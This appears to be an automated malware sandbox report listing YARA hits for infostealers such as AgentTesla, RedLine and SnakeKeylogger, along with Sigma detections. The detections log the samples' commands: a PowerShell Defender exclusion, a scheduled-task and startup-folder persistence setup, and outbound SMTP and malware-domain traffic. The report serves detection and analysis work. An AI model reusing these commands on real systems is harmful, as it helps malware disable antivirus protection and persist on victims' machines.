13.0.neworigin.exe.e00000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.RegSvcs.exe.36a5570.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.RegSvcs.exe.36a5570.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.RegSvcs.exe.36a5570.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.RegSvcs.exe.36a5570.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x72a9b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x72b0d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x72b97:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x72c29:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x72c93:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x72d05:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x72d9b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x72e2b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
12.0.server02.exe.880000.0.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
12.0.server02.exe.880000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.0.server02.exe.880000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.0.server02.exe.880000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x10191:$a1: get_encryptedPassword 0x104cd:$a2: get_encryptedUsername 0xff1e:$a3: get_timePasswordChanged 0x1003f:$a4: get_passwordField 0x101a7:$a5: set_encryptedPassword 0x11b77:$a7: get_logins 0x11828:$a8: GetOutlookPasswords 0x11606:$a9: StartKeylogger 0x11ac7:$a10: KeyLoggerEventArgs 0x11663:$a11: KeyLoggerEventArgsEventHandler
12.0.server02.exe.880000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1541d:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1491b:$a3: \Google\Chrome\User Data\Default\Login Data 0x14c29:$a4: \Orbitum\User Data\Default\Login Data 0x15a21:$a5: \Kometa\User Data\Default\Login Data
9.2.RegSvcs.exe.36a5570.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.RegSvcs.exe.36a5570.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.RegSvcs.exe.36a5570.2.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33a7b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33aed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33b77:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33c09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33c73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33ce5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33d7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33e0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.RegSvcs.exe.381ebc0.3.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
9.2.RegSvcs.exe.381ebc0.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.RegSvcs.exe.381ebc0.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.RegSvcs.exe.381ebc0.3.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.RegSvcs.exe.381ebc0.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.RegSvcs.exe.381ebc0.3.raw.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x1786e4:$a20: get_LastAccessed 0x17c05d:$a30: set_GuidMasterKey 0x1793bd:$a31: set_username 0xd2fc1:$a32: set_version 0xeaff1:$a32: set_version 0x103011:$a32: set_version 0xd1f8e:$a33: get_Clipboard 0xe9fbe:$a33: get_Clipboard 0x101fde:$a33: get_Clipboard 0xd1fd5:$a34: get_Keyboard 0xea005:$a34: get_Keyboard 0x102025:$a34: get_Keyboard 0xd31e0:$a35: get_ShiftKeyDown 0xeb210:$a35: get_ShiftKeyDown 0x103230:$a35: get_ShiftKeyDown 0x17aa24:$a35: get_ShiftKeyDown 0x17aa35:$a36: get_AltKeyDown 0xd1ffb:$a37: get_Password 0xea02b:$a37: get_Password 0x10204b:$a37: get_Password 0x178c81:$a37: get_Password
9.2.RegSvcs.exe.381ebc0.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd2031:$a1: get_encryptedPassword 0xea061:$a1: get_encryptedPassword 0x102081:$a1: get_encryptedPassword 0xd236d:$a2: get_encryptedUsername 0xea39d:$a2: get_encryptedUsername 0x1023bd:$a2: get_encryptedUsername 0xd1dbe:$a3: get_timePasswordChanged 0xe9dee:$a3: get_timePasswordChanged 0x101e0e:$a3: get_timePasswordChanged 0xd1edf:$a4: get_passwordField 0xe9f0f:$a4: get_passwordField 0x101f2f:$a4: get_passwordField 0xd2047:$a5: set_encryptedPassword 0xea077:$a5: set_encryptedPassword 0x102097:$a5: set_encryptedPassword 0xd3a17:$a7: get_logins 0xeba47:$a7: get_logins 0x103a67:$a7: get_logins 0xd36c8:$a8: GetOutlookPasswords 0xeb6f8:$a8: GetOutlookPasswords 0x103718:$a8: GetOutlookPasswords
9.2.RegSvcs.exe.381ebc0.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x17c9bb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x17ca2d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x17cab7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x17cb49:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x17cbb3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x17cc25:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x17ccbb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x17cd4b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.RegSvcs.exe.381ebc0.3.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x179bd3:$s2: GetPrivateProfileString 0x179215:$s3: get_OSFullName 0xd31c4:$s5: remove_Key 0xd325c:$s5: remove_Key 0xeb1f4:$s5: remove_Key 0xeb28c:$s5: remove_Key 0x103214:$s5: remove_Key 0x1032ac:$s5: remove_Key 0x17aa05:$s5: remove_Key 0x17abca:$s5: remove_Key 0xd3f14:$s6: FtpWebRequest 0xebf44:$s6: FtpWebRequest 0x103f64:$s6: FtpWebRequest 0xd600c:$s7: logins 0xd7573:$s7: logins 0xd8042:$s7: logins 0xee03c:$s7: logins 0xef5a3:$s7: logins 0xf0072:$s7: logins 0x10605c:$s7: logins 0x1075c3:$s7: logins
9.2.RegSvcs.exe.381ebc0.3.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0xd600c:$s10: logins 0xd7573:$s10: logins 0xd8042:$s10: logins 0xee03c:$s10: logins 0xef5a3:$s10: logins 0xf0072:$s10: logins 0x10605c:$s10: logins 0x1075c3:$s10: logins 0x108092:$s10: logins 0x17c99d:$s10: logins 0x17cf0f:$s10: logins 0x17fc0e:$s10: logins 0x17fccc:$s10: logins 0x1817ae:$s10: logins 0x17d123:$s11: credential 0x181aac:$s11: credential 0xd1f8e:$g1: get_Clipboard 0xe9fbe:$g1: get_Clipboard 0x101fde:$g1: get_Clipboard 0xd1fd5:$g2: get_Keyboard 0xea005:$g2: get_Keyboard
9.2.RegSvcs.exe.3744790.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.RegSvcs.exe.3744790.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
25.2.surmit.exe.4050000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 24 88 44 24 2B 88 44 24 2F B0 E7 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
9.2.RegSvcs.exe.3890010.7.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
9.2.RegSvcs.exe.3890010.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.RegSvcs.exe.3890010.7.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.RegSvcs.exe.3890010.7.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.RegSvcs.exe.3890010.7.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.RegSvcs.exe.3890010.7.raw.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x107294:$a20: get_LastAccessed 0x10ac0d:$a30: set_GuidMasterKey 0x107f6d:$a31: set_username 0x61b71:$a32: set_version 0x79ba1:$a32: set_version 0x91bc1:$a32: set_version 0x60b3e:$a33: get_Clipboard 0x78b6e:$a33: get_Clipboard 0x90b8e:$a33: get_Clipboard 0x60b85:$a34: get_Keyboard 0x78bb5:$a34: get_Keyboard 0x90bd5:$a34: get_Keyboard 0x61d90:$a35: get_ShiftKeyDown 0x79dc0:$a35: get_ShiftKeyDown 0x91de0:$a35: get_ShiftKeyDown 0x1095d4:$a35: get_ShiftKeyDown 0x1095e5:$a36: get_AltKeyDown 0x60bab:$a37: get_Password 0x78bdb:$a37: get_Password 0x90bfb:$a37: get_Password 0x107831:$a37: get_Password
9.2.RegSvcs.exe.3890010.7.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x60be1:$a1: get_encryptedPassword 0x78c11:$a1: get_encryptedPassword 0x90c31:$a1: get_encryptedPassword 0x60f1d:$a2: get_encryptedUsername 0x78f4d:$a2: get_encryptedUsername 0x90f6d:$a2: get_encryptedUsername 0x6096e:$a3: get_timePasswordChanged 0x7899e:$a3: get_timePasswordChanged 0x909be:$a3: get_timePasswordChanged 0x60a8f:$a4: get_passwordField 0x78abf:$a4: get_passwordField 0x90adf:$a4: get_passwordField 0x60bf7:$a5: set_encryptedPassword 0x78c27:$a5: set_encryptedPassword 0x90c47:$a5: set_encryptedPassword 0x625c7:$a7: get_logins 0x7a5f7:$a7: get_logins 0x92617:$a7: get_logins 0x62278:$a8: GetOutlookPasswords 0x7a2a8:$a8: GetOutlookPasswords 0x922c8:$a8: GetOutlookPasswords
9.2.RegSvcs.exe.3890010.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x10b56b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x10b5dd:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x10b667:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x10b6f9:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x10b763:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x10b7d5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x10b86b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x10b8fb:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.RegSvcs.exe.3890010.7.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x108783:$s2: GetPrivateProfileString 0x107dc5:$s3: get_OSFullName 0x61d74:$s5: remove_Key 0x61e0c:$s5: remove_Key 0x79da4:$s5: remove_Key 0x79e3c:$s5: remove_Key 0x91dc4:$s5: remove_Key 0x91e5c:$s5: remove_Key 0x1095b5:$s5: remove_Key 0x10977a:$s5: remove_Key 0x62ac4:$s6: FtpWebRequest 0x7aaf4:$s6: FtpWebRequest 0x92b14:$s6: FtpWebRequest 0x64bbc:$s7: logins 0x66123:$s7: logins 0x66bf2:$s7: logins 0x7cbec:$s7: logins 0x7e153:$s7: logins 0x7ec22:$s7: logins 0x94c0c:$s7: logins 0x96173:$s7: logins
9.2.RegSvcs.exe.3890010.7.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x64bbc:$s10: logins 0x66123:$s10: logins 0x66bf2:$s10: logins 0x7cbec:$s10: logins 0x7e153:$s10: logins 0x7ec22:$s10: logins 0x94c0c:$s10: logins 0x96173:$s10: logins 0x96c42:$s10: logins 0x10b54d:$s10: logins 0x10babf:$s10: logins 0x10e7be:$s10: logins 0x10e87c:$s10: logins 0x11035e:$s10: logins 0x10bcd3:$s11: credential 0x11065c:$s11: credential 0x60b3e:$g1: get_Clipboard 0x78b6e:$g1: get_Clipboard 0x90b8e:$g1: get_Clipboard 0x60b85:$g2: get_Keyboard 0x78bb5:$g2: get_Keyboard
7.2.surmit.exe.41a0000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 24 88 44 24 2B 88 44 24 2F B0 E7 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
29.2.RegSvcs.exe.3e95570.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.RegSvcs.exe.244df16.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.RegSvcs.exe.36e2790.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.RegSvcs.exe.36e2790.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.RegSvcs.exe.36e2790.4.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33a7b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33aed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33b77:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33c09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33c73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33ce5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33d7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33e0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.RegSvcs.exe.4ea0000.9.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
29.2.RegSvcs.exe.3e96458.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
29.2.RegSvcs.exe.3e96458.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.RegSvcs.exe.4bc0000.8.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.RegSvcs.exe.4ea0ee8.10.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
29.2.RegSvcs.exe.3e95570.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
28.2.surmit.exe.49a0000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 24 88 44 24 2B 88 44 24 2F B0 E7 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
9.2.RegSvcs.exe.244df16.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.RegSvcs.exe.4ea0ee8.10.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.RegSvcs.exe.4bc0000.8.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.RegSvcs.exe.38575f0.5.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
9.2.RegSvcs.exe.38575f0.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.RegSvcs.exe.38575f0.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.RegSvcs.exe.38575f0.5.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.RegSvcs.exe.38575f0.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.RegSvcs.exe.38575f0.5.raw.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x13fcb4:$a20: get_LastAccessed 0x14362d:$a30: set_GuidMasterKey 0x14098d:$a31: set_username 0x9a591:$a32: set_version 0xb25c1:$a32: set_version 0xca5e1:$a32: set_version 0x9955e:$a33: get_Clipboard 0xb158e:$a33: get_Clipboard 0xc95ae:$a33: get_Clipboard 0x995a5:$a34: get_Keyboard 0xb15d5:$a34: get_Keyboard 0xc95f5:$a34: get_Keyboard 0x9a7b0:$a35: get_ShiftKeyDown 0xb27e0:$a35: get_ShiftKeyDown 0xca800:$a35: get_ShiftKeyDown 0x141ff4:$a35: get_ShiftKeyDown 0x142005:$a36: get_AltKeyDown 0x995cb:$a37: get_Password 0xb15fb:$a37: get_Password 0xc961b:$a37: get_Password 0x140251:$a37: get_Password
9.2.RegSvcs.exe.38575f0.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x99601:$a1: get_encryptedPassword 0xb1631:$a1: get_encryptedPassword 0xc9651:$a1: get_encryptedPassword 0x9993d:$a2: get_encryptedUsername 0xb196d:$a2: get_encryptedUsername 0xc998d:$a2: get_encryptedUsername 0x9938e:$a3: get_timePasswordChanged 0xb13be:$a3: get_timePasswordChanged 0xc93de:$a3: get_timePasswordChanged 0x994af:$a4: get_passwordField 0xb14df:$a4: get_passwordField 0xc94ff:$a4: get_passwordField 0x99617:$a5: set_encryptedPassword 0xb1647:$a5: set_encryptedPassword 0xc9667:$a5: set_encryptedPassword 0x9afe7:$a7: get_logins 0xb3017:$a7: get_logins 0xcb037:$a7: get_logins 0x9ac98:$a8: GetOutlookPasswords 0xb2cc8:$a8: GetOutlookPasswords 0xcace8:$a8: GetOutlookPasswords
9.2.RegSvcs.exe.38575f0.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x143f8b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x143ffd:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x144087:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
Click to see the 61 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\TrojanAI.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\TrojanAI.exe, ParentProcessId: 7644, ParentProcessName: TrojanAI.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 7828, ProcessName: powershell.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\surmit.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\surmit.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\surmit.vbs" , ProcessId: 2736, ProcessName: wscript.exe

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\TrojanAI.exe, ProcessId: 7644, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 00:46 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 00:46 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\TrojanAI.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\TrojanAI.exe, ParentProcessId: 7644, ParentProcessName: TrojanAI.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 00:46 /du 23:59 /sc daily /ri 1 /f, ProcessId: 7856, ProcessName: schtasks.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 51.195.88.199, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\neworigin.exe, Initiated: true, ProcessId: 7692, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49738

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\surmit.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\surmit.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\surmit.vbs" , ProcessId: 2736, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\TrojanAI.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\TrojanAI.exe, ParentProcessId: 7644, ParentProcessName: TrojanAI.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 7828, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\bothsided\surmit.exe, ProcessId: 7444, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\surmit.vbs

Suricata Signatures

ET MALWARE DNS Query to Expiro Domain (eufxebus .biz)

